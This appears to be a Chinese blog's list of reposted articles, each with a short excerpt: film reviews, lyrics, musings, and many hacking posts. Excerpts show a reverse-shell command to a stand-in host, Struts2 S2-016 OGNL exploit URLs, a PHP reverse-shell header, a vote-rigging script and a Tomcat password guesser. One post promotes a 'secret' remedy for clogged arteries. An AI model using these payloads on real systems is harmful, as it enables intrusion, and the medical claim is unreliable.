- 博客(86)
- 收藏
- 关注
RSS订阅转载 股票操盘手鉴语
一、假如我是一个庄家,我会怎么做? 股票市场的定律是一赢两平七亏,意思是70%以上的人都会亏损。那散户如何才能站到赢利的10%人的群体中?我认为,机构为了赚散户钱,不断的在研究散户心理和行为学,我们散户不妨反过来,把自己当成机构投资者,也来研究一下机构的心理和行为学,这样才能在这个充...
2015-04-26 16:17:00
777
转载 《我的早更女友》影评—珍惜身边人
“你们女人就是想找个爹过日子吗?”电影院里刚看完《我的早更女友》,某人适时冒出来一句。我尚在感慨结局的恶搞,于是想也没想,决然地说,才不是。可是答完之后回头细想又有点心虚。 也许女生幻想中的暖男是比较接近爹的质地吧,暖男都是用来给历经沧桑的大龄女青年收拾破罐子的:受伤时是擤...
2015-03-15 15:57:00
388
转载 《心花路放》影评—电影里总有一个自己
第一次听说《心花路放》这个片子的时候,这个片子还叫《玩命邂逅》。 其实早就想到这个片子会好,但没想到这个片子仍然超出了我的预期。宁浩在这部片子所体现出来的新思维以及呈现人物的新方法让我眼前一亮。 我认为这是今年中国拍的最好的喜剧电影,他不是用低级乃至低俗的...
2014-11-28 14:32:00
750
转载 许巍·此时此刻2014全球巡演济南站
回首故乡来时的路,一路跌跌撞撞,不知道许巍竟然能够唱到我的最痛处,一直以为自己很坚强,坚强的忘记贫穷忘记眼泪忘记故乡忘记回望,无坚不摧的硬度只想保护自己的尊严不被受伤,今天却被许巍的音乐打击的七零八落,一种无孔不入的境地。 许巍的音乐里有种根深蒂固的沧桑和忧伤,每个音符每个字节,有沉重抑郁有...
2014-11-28 14:03:00
190
转载 烦心的一天
心累、生活一团糟、生活不知.......,有时候理性到冷血,有时候感性到兽性,有时候自己都不知道自己是怎么样的人,我不想界定自己是一个怎么样的人,也不想用条条框框来约束自己, 还是真实的生活好 ...
2014-08-04 20:33:00
84
转载 我从来没去过纽约
原曲:Udo Jürgens 原词:MichaelKunze 中文歌词:肖央 演唱: 筷子兄弟 晚饭后我对她说 我想要出去买一包香烟 她叫我回来时轻一点 不要打扰孩子的睡眠 我静静打开门走...
2014-07-25 08:33:00
127
转载 勿忘心安
不要再逗留 人心太拥挤 被混乱的游戏或是真理的命运 我自己问自己 完成到这里 到底还剩多少不用挣扎的阴霾 只是无奈这些问题 无人交流 只好任凭生命去阻碍 中途的放纵 才选错了出口 泛滥的欲望无邪 却沦为烂醉 早已该放手 这无休的阴谋 玩笑已过半 不由不该 路还有汗流 梦还没腐...
2014-06-09 22:09:00
113
转载 专业级音箱试音10大歌曲
选自刘蔓《当我想起你》专辑,这张唱片由广州妙音音乐出品,采用DSD录音技术,录音品质极佳。本张专辑收录一些翻唱的老流行歌,但全部都重新编曲,别有 一番风味。这首黄品源原唱的《海浪》,经过刘蔓重新演绎后,表现出一种完全不一样味道,多了很多少妇式的忧伤,配乐以清淡的钢琴和小提琴为主,非...
2014-04-23 23:02:00
18672
转载 《致父亲》
偶感,遂写下无名打油诗以自省 致父亲: 为师一生终觉浅,双鬓苍然心已倦,儿孙几时堂前过,莫等随风拂袖间 转载于:https://my.oschina.net/china...
2014-04-21 10:50:00
94
转载 哥哥
哥哥 作词:王平久 作曲:常石磊 演唱:常石磊 哥从小我一直问你 为什么你是哥我是弟 哥你总是那样严厉 为什么爱我从不放弃 哥在风雨中看见你 为什么你始终没泪滴 哥我要和你站在一起 我知道你也没...
2014-03-09 19:37:00
123
转载 基于X-Forwarded-For变更的刷票脚本
Vote_ID.py: #!/usr/bin/env pythonimport sysimport httplib,urllibimport threadingimport reimport IPGenclass vote(threading.Thread):...
2014-02-24 16:39:00
216
转载 没死,你就赢了
某男同学给我打电话,突然感悟:感觉现在的社会操行,让越来越多的年轻人被束缚着,男人越来越娘,女人越来越汉子。 还有一个小的社会感悟,就是搞作品的不要轻易走到前台,葛优同学出席的商业活动很少,却能立于实力男演员的不败之地。娱乐圈的人整的都跟玩神秘似...
2014-02-20 23:29:00
88
转载 书的序
友情撰序: 静谧夜空,星满苍穹,广袤大地被月光擦拭得那样清澈,散发着童话般的馨香。如此美的夜,充满着浪漫和陶醉,可在黑客技术旅者的眼中,却是那样朴素而平常。 萤火 学海无涯苦坐舟 草长莺飞的旷野,他们像是坠落草原的星辰,简约沉默,却在寒夜中闪烁着坚强的光。是萤火虫,...
2014-02-12 21:52:00
201
转载 Python写的TOMCAT口令猜解工具
#!/usr/bin/env python # -*- coding: utf-8 -*- # Functions: Idenfy tomcat password# Code By BlAck.Eagleimport threading, time, random, sys, u...
2014-01-15 15:24:00
146
转载 PYTHON自动化WEB旁注目录扫描器
#!/usr/bin/env python#encoding = utf-8import urllib,httplibfrom urllib2 import Request, urlopen, URLErrorimport Queue,sys,timeimport reimpor...
2013-12-19 00:03:00
176
转载 Apache安全和强化的十三个技巧
本文假设你知道这些基本知识: 文档的根目录: /var/www/html or /var/www 主配置文件: /etc/httpd/conf/httpd.conf (RHEL/CentOS/Fedora等系统) 或/etc/apache/apache2.conf (De...
2013-12-17 12:45:00
126
转载 路由器、交换机及防火墙漏洞分析及应对措施
【TechTarget中国原创】 远程连接到网络资源已经成为现代企业很多员工的工作需要。无论这种连接是通过VPN、远程桌面还是安全壳(SSH)进行的,这种连接将不可避免地穿过装载着路由器、交换机和防火墙的网络,而这些设备中有很多都很容易受到攻击。 安全行业的企业和管理人员都意识到了这个...
2013-12-12 13:33:00
973
转载 汪峰与许巍
首先接触的是许巍,那是2004年,由于一个朋友的推荐,我听了许巍,刚开始感觉似乎同一种调调,确实,许巍的创作,基本上是一个套,吉他的套,在吉他中 一个和弦一个和弦地走。但是慢慢地觉得许巍非常厉害的是,许巍作的套非常套人。他的每一个旋律都是入耳难忘的,那么顺那么巧又那么别致。 当身边的...
2013-11-10 22:34:00
187
转载 IIS安全性配置
最近,和朋友们在聊及ASP.NET程序的安全性没有JAVA高,IIS(Internet Infomartion Server)的存在很多漏洞(以及新型蠕虫,例如Code Red 和Nimda),安全得不到保障。针对IIS的安全性查了些资料,发现IIS的安全性曾被普遍关注。权威人士以及Mi...
2013-11-08 11:35:00
408
转载 打通血管血栓绝密配方!
一位居住在伦敦的人的亲身经历,他去巴基斯坦开会的时候,突然胸口剧痛,后来被医院验出来,他的三条心血管已经被严重堵塞,需要做搭桥手术。手术的时间是一个月以后,在这个期间,他去看一位 回教国家古法治疗师。 这 位 Hakim让他自己在家中做一个食疗,他吃了一个月。一个月后他去同一家医院做检查,发...
2013-10-17 17:21:00
128
转载 慢一点恋爱,别急着洞房
我所看到的人都在急,特别的急,急着要男朋友,急着要女朋友。女朋友着急要房子,要车子,想旅游,又想享受生活,想安逸。男朋友又得拼命工作,阅历不深却又着急看透世界,甚至于连一篇文章都没有时间读完,告诉我,你们究竟急的是什么? 生于上世纪70年代末的我,不知道80、90你们这一代人怎...
2013-09-25 11:10:00
171
转载 一次服务器被入侵后的分析
最近有个朋友让我去帮他看一下他的linux服务器.说是apache启动不了,有很多诡异的情况.后来证明绝不是apache启动不了这么简单. 登上服务器之后随便看了下,最先引起我注意的是”ls”命令的输出: lars@server1:~$ ls ls: inval...
2013-09-22 10:22:00
375
转载 又一款linux提权辅助工具 – Linux_Exploit_Suggester
Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。 例子: $ perl ./Linux_Exploit_Sug...
2013-09-22 10:05:00
133
转载 一份Archmake.COM的渗透测试报告
前言 这是offensive security发布的一份渗透测试报告样例。offensive security 是backtrack-linux.org、exploit-db.com的缔造者。 概述 Offensive security已经被授权对Archmake的外部...
2013-09-22 09:46:00
149
转载 解密JBoss和Weblogic数据源连接字符串和控制台密码
0x00 背景 现在越来越多的站喜欢用java语言的框架做web应用了,这里应用有很多大型站点经常采用jboss或者weblogic做web服务器。出于安 全原因,他们都提供把数据源连接密码以及web服务器后台密码加密的功能,jboss用的是blowfish,weblogi...
2013-07-29 12:08:00
195
转载 [黑客讲坛]黑吃黑
来源:乌云 1.社工库 如今主流的各种CMS爆出漏洞,让脱库事件频频发生,从前年的数据库泄漏事件,繁衍出了社工库这么一强大的玩意儿。从之前的比较出名上 CCAV的365社工库到后来的数据芯。让人们不得不重视网站的安全和隐私的保护还有密码的安全性。咳咳,今天要说的不是这个,而的...
2013-07-25 16:07:00
189
转载 [电子书]渗透测试框架Metasploit基础(中文版PDF)
来源:Gall @ 周边@freebuf 整理此文档,纯粹出于兴趣爱好,如果有涉及版权的问题,请联系原文档的作者。由于本人能力有限,文档中难免会有些错误,欢迎大家指正。 内容: Metasploit基础知识 msfcli msfconsole...
2013-07-25 15:37:00
704
转载 分享一段struts st2漏洞批量查找的Python代码
来源:x55admin@freebuf #! /usr/bin/env python# -*-coding:cp936-*-# by: x55admin# 用法:Key?: 关键字 inurl:.action?import urllib2,urllib,thr...
2013-07-25 15:33:00
318
转载 [黑客讲坛]互联网公司的"蛋"疼 7
导读:收到一篇文风很诙谐洒脱的独家投稿文章,作者应该对黑色产业链很熟悉。 就我个人看来,“业务安全”是未来安全行业里最有钱途的金矿。但今天能做的好的公司非常少,因为每家公司的业务都有自己的特点,所以很难有通用的解决方案,这可能也是为什么安全行业几乎没有什么好产品来解决这个问题...
2013-07-25 14:57:00
436
转载 年轻的一天
趟过生活的长河. 我不孤独也不寂寞.内心无限的暇想总使我偶尔失眠却不多梦.顾及着现实与理想的选择.转来转去却不知道真正的理想是什么.酒后总会无比洒脱.那样就不会再动脑一些什么.你要告诉我什么是年轻人真正的生活.我总是会说那就是认认真真的过.年轻只有一次我们不能太犹豫什么.想法总是浮躁...
2013-07-21 13:53:00
70
转载 Struts2 S2-16漏洞利用工具
昨天Struts漏洞大爆发,N多大站被爆出存在strtus2漏洞,百度,百合,京东等也在其中,本站也等一时间发布了strtus2漏洞的预警,具体文章请看 struts2最新s2-016代码执行漏洞 – CVE-2013-2251,当时小弟说了稍候公布利用EXP,现在就兑现承诺。 首先发...
2013-07-19 13:55:00
1079
转载 Struts2 S2-016/S2-017 查看物理路径 EXP
http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%...
2013-07-18 14:22:00
134
转载 Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell e...
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(n...
2013-07-18 14:21:00
450
转载 stuts2 EXP POST 数据
CVE-2013-2251当前目录写入test.jsp?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23re...
2013-07-18 14:05:00
130
转载 反弹shell的十种姿势(偶然看到一些整理下)
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1,注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,P...
2013-07-13 16:58:00
349
转载 我对空性的一点看法
佛教的思想精华用一个字来概括,便是“空”。 空指的是这个世界的本质,包括人、事、物。之所以是空的,佛就教人放下一切。到这儿,或许凡俗的人们就说佛教 太消极悲观了。其实,这些论调太有偏见,是从消极与迷信的角度去看待佛教的。假如世间是实的,永恒的话,佛就会鼓...
2013-07-11 18:55:00
149
转载 PHP反弹脚本 Linux/Windows两用
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; ...
2013-07-11 15:03:00
206
转载 电影,我想说的!
小刘知道,文字总是不能够深刻的表达人的内心世界,但是能给人无尽的遐想空间。视频可以给人最纯粹的视觉冲击,但有时候也是不能直指人的内心世界。文字比国内的视频犀利,国内的视频比文字保守。看了好多国人的电视剧总是感觉好多不能找到真实的心灵世界。 小刘一大早...
2013-07-07 15:04:00
112
转载 一张图告诉你黑客们是怎么赚钱的?
黑客,现在似乎已经成为现代“侠客”的代名词,但是侠客们也得赚钱吃饭,那么黑客们是怎么赚钱的?我们的互联网之下,有什么样隐秘的产业链正在运行…… 转载于:https://my.o...
2013-07-05 13:34:00
752
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人